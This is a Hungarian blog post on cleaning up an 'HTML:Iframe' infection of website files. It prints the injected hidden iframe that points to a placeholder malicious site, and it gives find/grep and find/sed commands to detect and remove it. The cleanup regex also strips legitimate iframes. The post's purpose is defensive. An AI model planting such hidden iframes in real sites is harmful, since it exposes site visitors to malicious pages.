HTML:Iframe fertőzés, vírus, felismerés, javítás
Sajnos nem régen találkoztam egy HTML:Iframe fertőzéssel, mely igen agresszíven támadta az összes olyan php, asp, htm, html fájlt melyben <html>, <body> tag volt. Valamint megtámadta azokat a fájlokat is melyekben nem volt ugyan ilyen html tag, de a fájlnév tartalmazta az "index" szót.
Maga a fertőzés nagyon könnyen észrevehető, ugyan is a következő kódot szúrja be a fent említett fájlokba:
<iframe src="http://kártékony.oldal" width=147 height=184 style="visibility: hidden"></iframe>
Ahol talál <body> tagot ott rögtön a tag után szúrja be, ahol nem ott egyszerűen a fájl végére illeszti a kódot.
A fertőzés keresése (linux alatt):
find . -iname "*index*" | xargs grep "<iframe"
Ez a rövid script kilistáz minden olyan fájl, melynek a neve tartalmazza az "index" szót, valamint a tartalmában megtalálható az "<iframe" részlet...
A fertőzés eltávolítása (linux alatt):
Szerver oldalon ezt a fertőzést gyorsan orvosolhatjuk, javíthatjuk a következő rövid scripttel:
find . -iname "*index*" -exec sed -i 's/<iframe.*.*iframe>//g' {} \;
rövid magyarázat:
find . -iname "*index*" : megkeresi azokat a fájlokat melyek nevében megtalálhat az alábbi minta: *index* (javasoljuk a *.php használatát, illetve *.htm, *.html, *.asp ...)
-exec sed -i 's/<iframe.*.*iframe>//g' {} \; : a find által talált fájlokban megkeresi a "<iframe...bármilyen szöveg...iframe> részt és lecseréli egy szóközre.
Mindenek előtt csináljunk egy biztonsági másolatot mielőtt a scriptet lefuttatnánk!
Sajnos valószínűsíthető, hogy a fertőzést megelőzi egy ftp jelszó lopás is. Ugyanis a totalcommander és egyéb programok az ftp jelszavakat mesterjelszó nélkül is visszafejthetően tárolják, ezt egy esetleges vírus kihasználva már hozzáférést is szerez a vírus gazdájának, aki ezek után egész sok bosszúságot okozhat.
Remélem rövid írásom segít azoknak akik hasonló helyzetbe kerülnek!
